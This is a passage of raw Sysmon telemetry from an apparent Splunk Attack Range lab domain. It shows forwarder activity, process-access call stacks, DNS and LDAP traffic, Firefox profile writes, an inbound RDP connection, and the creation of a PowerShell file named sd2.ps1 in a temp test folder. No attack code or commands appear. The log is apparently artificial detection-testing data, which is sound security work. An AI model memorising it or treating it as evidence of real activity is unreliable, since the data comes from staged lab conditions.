Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61C01139AD2F7BC2B8257F2920E12C2,SHA256=E7B8D22B37E14ED4B8025B43F17FA678B248AC57FF6ABB64A508D67C75DF9423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:14.896{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA6803D6B4CF4B4F49C4F3AA3772AD3,SHA256=5B16647E9849A72D783B31541E21A633B0BEAC964B3E1F966F9616A7B3A79BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:14.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9910C233E55C7BDB91BAE9247CC14DD0,SHA256=19BD9D6F8E30877902C393478A0833615F800D2FD62AA0BBAF51E16C23B72000,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:14.580{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.090{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54419- 354300x80000000000000001052577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.089{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59385- 354300x80000000000000001052576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.088{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55786- 23542300x80000000000000001052582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:15.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD324D6ECC02BE4770E4DFA6B147BB3A,SHA256=608E4D976FE9974A1C67D3ABABBA86485397D4EE732AA1ECF0A14376BEDC423B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:15.942{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3F10C2E85E34FEB6D69F6112E654B7D,SHA256=9A65584C353807E0F5A68E3A1415B211CE9AB1729F69FC895069728A0C30F161,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:14.341{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57392-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:15.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43EE3BD9AFB080C0EBED4634267DA8FF,SHA256=97A9845B9CF0AAC5F4514DABCD8C896A921E29008E1F925AF8D07F105DECB5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:16.943{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B0CC9CCD8355744910B58DAF40B24CE,SHA256=3A0E0D6B5CBB98DD21AF0192907B043CB08A167DD58E778795C412A02B9B6A14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.341{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-59243-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001052584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.019{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51169-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.019{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51169-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000809344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:17.989{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1221C0A4856983B3267AACFE4A3F2988,SHA256=118812F9E413D0793B6DD9410972A569A3A831112FCECBE77E63636D2C705BEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.703{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51170-false10.0.1.12-8000- 11241100x80000000000000001052588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:17.038{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 23542300x80000000000000001052587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:17.038{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps1MD5=FD964C2C1008837F4729AA06C45A99AB,SHA256=A1DBBC8C3FB38A648CAB6C8866108F281CD55F0EBE6BA7A61CA83FEB6812F923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:17.006{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F862A88097FEA78E2B5323C7D6B890C,SHA256=5DE67BD18B82B62EE0AA29432CC090ACEF0B72B35AF46733AF5048C180552559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:18.453{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:18.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F00EBA56BC396FFB21E00ED8AFF1E7,SHA256=316073532F5BF9F27FBC7E955CC276CB85C75E6FEB6538A7E8ECBD316CEBE08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:19.005{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AB61B987EF32913843D72E2D991032,SHA256=E85D50E9F893D1447CE7067C58504205FD459EE285040C983EF6F00BFCF47605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:19.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E801D07D10609F631E05DBAC4CEE3F4E,SHA256=243A775BD1198399968D22BD715A677A6A5242011091ED6AB1F7FBEDCDDE1F68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:20.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CF89F8070627D3BFC18DE3EC3E7C736,SHA256=D4E46C5C457CD361FED8CB2EEA0CED36134B7587D253E858537865F00CD74E19,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:20.067{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263C5594171704DF6306D284AE9404C7,SHA256=F5007EED9185A5F8AF9976377336BB50EA6BAE6F820644E63A1D3CE1F7E2519E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:20.739{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:20.052{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFFA6396332C8A322F9B7D0105AC8918,SHA256=DA594A0D521E896DBAE67FEE076060CBD5FCDFA9356A6E3E42B49C89E4B7B166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:21.067{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E336C4A8957484609640D2F28EFB34CB,SHA256=7A14C949FBAFF4D9FF6845336E020550F5699AE1FD48B9A5D2D898314A51B0D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:19.403{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57393-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:21.085{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4F653C17DEED5C5C246B0D99264A02,SHA256=77A4D1C36E2CCEAC47A987D59C87A52C4042179966772B687A59A29F31115E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.565{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=FC080046FA09E60B15E86AE652C3559F,SHA256=69B43C18DEA1876A3BFB2F0F3FA507DC2E4B6FCA2CA994C354E4EEAD43F985F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:14.569{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51171-false10.0.1.12-8000- 23542300x80000000000000001052607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.103{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84948F92CA9363B5F200AA55512CFDFF,SHA256=F96682ED8330993D7B682F35E34AA38C3F19B6394E02BC55ECF3B874DD2CB57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:22.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BB819A7158D19106D69BAC65DD13862,SHA256=F66FBF0FDE9B444C32F41AB27D01B43F4BA1CCCF39E6953ADF941FB1DEBA8BAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:20.872{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57394-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001052606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.066{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=602358628677AB35777AB7E494D8A927,SHA256=AEBC2ECB402650747FA5112B5895DFF3C30C30FA0E04B09E5DED2F60B5815C41,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.066{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=97CEBF3212B7865C6B1268402C8E1B96,SHA256=C0B730566A0BE3E303D5AD04582C9B569C558B7BCBB5BBFE508035121DDDE481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2641E8A6CD059CDCA43738B80A55371A,SHA256=1A3865DCF2803F9A270482FB2FC786EED3DCF11EF7173063C99E6D66157FFE17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=837B3017FBD669A6D2E1B2826C1F2ABD,SHA256=ADE5AA5189596B5C97C7994C2533FF0158A13A223E37EA052F953F74A9FF2EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B2C10654BF46A02F5CB1DDF21B6ED97D,SHA256=A27886467823E5C589AF9F4ACC89BA60CF6C7E71AF437736B731B000C71104A6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=66CDA290967B2139C3154DD09B3F79D6,SHA256=BAFE2EE331C1167DA6B8DE605F572023F11922BE94276EEC0B50E0D3D9E8070C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=12E22F42906229E008E0BF34CDEF9C11,SHA256=B0994D8CEB3DE460C195456696686DA7543561E540D293AC5DD771A265C8128B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8EEDD46FC205CA50193F66CAEB6EEB81,SHA256=AB1AC79E030D9F3DC4EFD5544D4C00DA155AF5F63A2D05C89F593F345219A255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A44F9EA55F02B16BD5F7003A202CC6E8,SHA256=1D9DFFC5770AA1E917E44D2FEDA49BC84AA2A48157E0165B2939C133FEFBB1AD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C9A86F429096F0DB9E12E6A93A4CB4F4,SHA256=7E39EE2DEAC771944FD903CE988CACA8702EA2E55A58F19B277AF6CFBC160B82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A13FB066A8D139E305E7BDF801694497,SHA256=2258DAB001D8EEB0DA267BC383C23830E605D9B6B382B02F3B47824C78E0CC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:23.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCEE8B4D1986C0BAD43EF6D5DFB21E68,SHA256=D6390831FA3B0FDC4078A8FD20A05CFE642E842F87C6774A17DAE5FB832F2CF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:23.103{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44A7933CB44B8EB0DC0E6C87772693C,SHA256=907FF1E32FC9CFE5F9281B6A7E91DB8A24364EF521321F87F442D88E64BAF04B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.552{0C1E0330-F710-60EB-B979-00000000D001}25321060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 